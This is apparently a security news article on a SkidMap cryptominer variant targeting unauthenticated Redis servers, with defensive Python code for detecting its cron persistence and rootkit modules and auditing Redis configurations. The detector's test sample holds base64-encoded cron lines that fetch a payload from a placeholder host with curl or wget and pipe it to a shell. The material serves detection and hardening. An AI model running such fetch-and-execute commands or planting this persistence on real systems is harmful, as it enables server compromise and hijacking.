Introduction: Redis and the New SkidMap Variant
As the number of unsecured servers continues to grow, malicious actors are finding new and innovative ways to exploit them. One of the latest and most alarming campaigns targets Redis servers using a new and sophisticated variant of SkidMap malware. Discovered by Trustwave researchers, this variant showcases the constant evolution of malware and the dangers of leaving servers unprotected.
SkidMap: A Brief History
What is SkidMap?
SkidMap is a notorious crypto-miner malware detected by Trend Micro in September 2019. Unlike similar miners, SkidMap's unique feature is its utilization of kernel-mode rootkits to evade detection. It has wreaked havoc by targeting Linux machines and loading malicious kernel modules, all while concealing its actions from the host system.
Evolution of SkidMap
SkidMap's history of targeting Linux machines has been marked by continuous evolution. From its initial detection, each subsequent variant has added new functionalities and increased sophistication.
Analyzing the New Variant: A Targeted Attack on Redis Servers
Targeted Linux Distributions
The new SkidMap variant, designed to target a wide range of Linux distributions, including Alibaba, Anolis, openEuler, EulerOS, Steam, CentOS, RedHat, and Rock, signifies an expansion of its reach.
The Focus on Open Redis Instances (NO AUTH)
The recent variant observed by researchers focuses exclusively on open Redis instances, commonly referred to as ‘NO AUTH’ instances. The absence of any brute-force attempts indicates a deliberate, targeted approach.
A Deep Dive Into the Attack Chain
Initial Attempts and Setup
The attack begins with an attempt to log into an unsecured Redis instance, followed by setting up variables containing base64-encoded cron tasks. These tasks are crucial in initiating the subsequent steps of the malware's execution.
Alternating Download Methods
Every 10 minutes, a cron job alternates between ‘curl’ and ‘wget’ to download and execute the dropper script, showing adaptability and persistence in maintaining the attack.
Deployment of the Dropper Shell Script
Threat actors then deploy a dropper shell script masquerading as a binary executable (ELF) that is in turn disguised as a GIF image file. Previous versions of the malware used a ‘jpeg’ disguise instead.
Adding SSH Keys and Disabling SELinux
Once deployed, the malware adds SSH keys in the standard locations and disables SELinux, a vital step in maintaining unauthorized access and facilitating further malicious actions.
Creating a Reverse Shell
A reverse shell is created to communicate back to the C2 server every hour over TCP port 8443, a stealthy and efficient way to maintain control over the compromised system.
Downloading Specific Packages
Depending on the Linux distribution and kernel, the malware downloads an appropriate package named gold, stream, or euler, further highlighting the variant's adaptability.
Installation of Kernel Modules and Launching a Bot
A series of shell scripts install the kernel modules, purge logs, and launch a bot to enable additional rootkit payloads. Payloads like mcpuinfo.ko are used to hide the miner, while kmeminfo.ko inspects and manipulates network packets.
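The persistence and rootkit stages described above leave two artifacts a defender can look for: cron entries that decode a base64 blob and pipe a curl or wget download into a shell, and kernel modules with the names the report associates with this variant. The Python below is an added example, not code from the article or from Trustwave's report. The crontab and /proc/modules samples are constructed here (the download host is a placeholder, not an indicator of compromise), and the module names are the two the text mentions.

```python
import base64
import re

# Names of the rootkit modules the report associates with this variant.
KNOWN_ROOTKIT_MODULES = {"mcpuinfo", "kmeminfo"}

# A run of base64 alphabet characters (16+) with optional padding, not glued to
# other base64 characters on either side.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])([A-Za-z0-9+/]{16,}={0,2})(?![A-Za-z0-9+/=])")
# The decode step that turns the blob back into a command.
DECODE_STEP = re.compile(r"base64\s+(?:-d|--decode)\b")
# A downloader whose output is piped straight into a shell.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(?:sh|bash|dash)\b")


def decode_b64_tokens(line):
    """Return the UTF-8 text of every valid base64 blob found in a line."""
    decoded = []
    for token in B64_TOKEN.findall(line):
        try:
            decoded.append(base64.b64decode(token, validate=True).decode("utf-8", "replace"))
        except ValueError:  # bad padding or not really base64 (binascii.Error is a ValueError)
            continue
    return decoded


def analyze_crontab(text):
    """Flag cron entries that decode a base64 blob and then fetch-and-run with curl or wget.

    Returns a list of (schedule, downloader, decoded_command) tuples.
    """
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or not DECODE_STEP.search(line):
            continue
        for command in decode_b64_tokens(line):
            match = FETCH_AND_RUN.search(command)
            if match:
                schedule = " ".join(line.split()[:5])
                findings.append((schedule, match.group(1), command))
    return findings


def suspicious_modules(proc_modules_text):
    """Return loaded module names (from /proc/modules-style text) that match the reported rootkit modules."""
    hits = []
    for line in proc_modules_text.splitlines():
        fields = line.split()
        if fields and fields[0] in KNOWN_ROOTKIT_MODULES:
            hits.append(fields[0])
    return hits


def build_sample_crontab():
    """Constructed sample crontab: two benign jobs plus two entries shaped like the
    persistence described above (10-minute cadence, alternating curl and wget,
    command hidden in base64). The host name is a placeholder, not an IoC."""
    commands = [
        "curl -fsSL http://dropper.example.invalid/payload.gif | sh",
        "wget -q -O- http://dropper.example.invalid/payload.gif | sh",
    ]
    encoded = [base64.b64encode(c.encode()).decode() for c in commands]
    return "\n".join([
        "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf",
        f"*/10 * * * * echo {encoded[0]} | base64 -d | sh",
        f"5-59/10 * * * * echo {encoded[1]} | base64 -d | sh",
        "30 2 * * * /opt/backup/run.sh",
    ])


# Constructed /proc/modules excerpt: two legitimate modules and the two names from the report.
SAMPLE_PROC_MODULES = """\
ext4 745472 1 - Live 0xffffffffc0a00000
mcpuinfo 16384 0 - Live 0xffffffffc0b00000
xt_conntrack 16384 2 - Live 0xffffffffc0c00000
kmeminfo 20480 0 - Live 0xffffffffc0d00000
"""

if __name__ == "__main__":
    for schedule, tool, command in analyze_crontab(build_sample_crontab()):
        print(f"[cron] {schedule} uses {tool} to fetch-and-run: {command}")
    for name in suspicious_modules(SAMPLE_PROC_MODULES):
        print(f"[kmod] rootkit module loaded: {name}")
```

In practice you would feed `analyze_crontab` the output of `crontab -l` for each user plus the files under `/etc/cron.d`, and `suspicious_modules` the contents of `/proc/modules` or `lsmod`. Because the rootkit's purpose is to hide the miner from the host, a clean result from the host itself is not conclusive; corroborate with the out-of-band signals the report mentions (CPU load, fan and temperature) and with network telemetry for the hourly outbound TCP/8443 beacon.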
Conclusions from the Trustwave Report
Detecting the Malware: A Daunting Task
According to the report, this malware is significantly more advanced than earlier variants, making detection in large server infrastructures highly challenging. On home computers, excessive fan activity and elevated case temperature were the only indicators.
The Vulnerability of Redis: A Warning
The report concludes with a stern warning about Redis. Exploiting its weaknesses is not complex: Redis was designed for closed environments, and that design makes an unprotected instance vulnerable by default, which calls for reconsidering its placement at the network's edge. Later releases did add security features, but the inherent risks remain.
Indicators of Compromise (IoCs) and Further Analysis
The Trustwave report also includes Indicators of Compromise (IoCs), essential for those dealing with potential threats from this variant. The published details provide valuable insights and tools for understanding and countering this evolving threat.
Redis Security: Recommendations and Best Practices
Understanding Redis Security Architecture
To counter the risks posed by SkidMap, understanding Redis's security architecture is vital. Its inherent exposure when deployed without protection requires stringent security measures.
Applying Patches and Keeping Systems Updated
Regular updates, patches, and monitoring of Redis servers are essential in maintaining security and thwarting potential attacks by variants like SkidMap.
Implementing Network Segmentation and Firewalls
Implementing network segmentation and firewalls can limit the spread of malware and protect the integrity of the server environment.
Continuous Monitoring and Incident Response
Continuous monitoring, coupled with a robust incident response plan, can facilitate early detection and prompt action to mitigate potential damage.
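The recommendations above come down to one concrete configuration question: can an unauthenticated client reach this Redis instance from the network? As an added example, not from the article or from the Trustwave report, the two redis.conf fragments below contrast the exposed ‘NO AUTH’ state with a hardened one, and a small Python audit flags the weak settings. It uses only standard redis.conf directives (bind, protected-mode, port, requirepass, user, rename-command); the password value, the severity labels and the message wording are this example's own choices.

```python
# Constructed redis.conf excerpt for an exposed instance: listening on every
# interface, protected mode off, and the password line commented out. This is
# the "NO AUTH" state the article describes.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass foobared
"""

# The same excerpt hardened: loopback only (clients live on the same host or
# reach it through a private segment), protected mode on, a password set, and
# two administrative commands disabled. The password value is a placeholder.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command FLUSHALL ""
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def parse_conf(text):
    """Parse redis.conf directives into {name: [[args...], ...]}; full-line comments are skipped."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_conf(text):
    """Return (severity, message) findings for settings that leave Redis open to the network."""
    conf = parse_conf(text)
    findings = []

    # No bind directive means all interfaces; "*" and 0.0.0.0/:: are wildcards.
    # A leading "-" marks an address as optional (Redis 6.2+), so strip it first.
    bind_values = [v.lstrip("-") for args in conf.get("bind", [["*"]]) for v in args]
    exposed = any(v not in LOOPBACK for v in bind_values)

    # Either the legacy requirepass or an ACL "user" rule carrying a password
    # (">plain" or "#sha256hex") counts as authentication being configured.
    has_auth = "requirepass" in conf or any(
        tok.startswith((">", "#")) for args in conf.get("user", []) for tok in args
    )

    # protected-mode defaults to yes; the last occurrence in the file is taken.
    protected = conf.get("protected-mode", [["yes"]])[-1][0].lower() == "yes"

    if exposed:
        findings.append(("high", f"bind {' '.join(bind_values)}: reachable from non-loopback addresses"))
    if not has_auth:
        findings.append(("high", "no requirepass and no ACL password: any client that connects is trusted"))
    if not protected:
        findings.append(("medium", "protected-mode no: the built-in guard for passwordless instances is disabled"))
    if exposed and not has_auth:
        findings.append(("critical", "open instance with no authentication: the exact 'NO AUTH' condition this variant targets"))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {label} ==")
        for severity, message in audit_conf(text) or [("ok", "no exposure findings")]:
            print(f"{severity:>8}: {message}")
```

The audit deliberately reports protected-mode as its own, lower-severity finding rather than treating it as a substitute for a password: how protected-mode interacts with an explicit non-loopback bind has changed across Redis versions, so the safe assumption for a review is that only a loopback bind plus real authentication (and a firewall or segment that keeps port 6379 off the edge) closes the door this variant walks through. Running the script against the config files gathered from a fleet gives the "is anything still open?" answer the monitoring recommendation above calls for.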
Conclusion: A Grave Reminder of Unceasing Threats
The newly discovered SkidMap variant is a glaring example of how malicious threats continue to evolve, targeting weaknesses in system security. The attack on unsecured Redis servers is a wake-up call to businesses and individuals alike. As technology advances, so does the sophistication of cyber-attacks. Staying vigilant and implementing comprehensive security measures are essential in this unending battle against cyber threats.
Further Resources:
- Understanding SkidMap: For a detailed analysis of the SkidMap malware, you can refer to Trend Micro's original research from September 2019.
- Latest Security Updates and Patches: If you are using any of the affected Linux distributions, make sure to check the respective security pages for updates and patches, such as:
- Trustwave Report: To dive into the technical details of the new SkidMap variant, the full report by Trustwave researchers provides an in-depth analysis.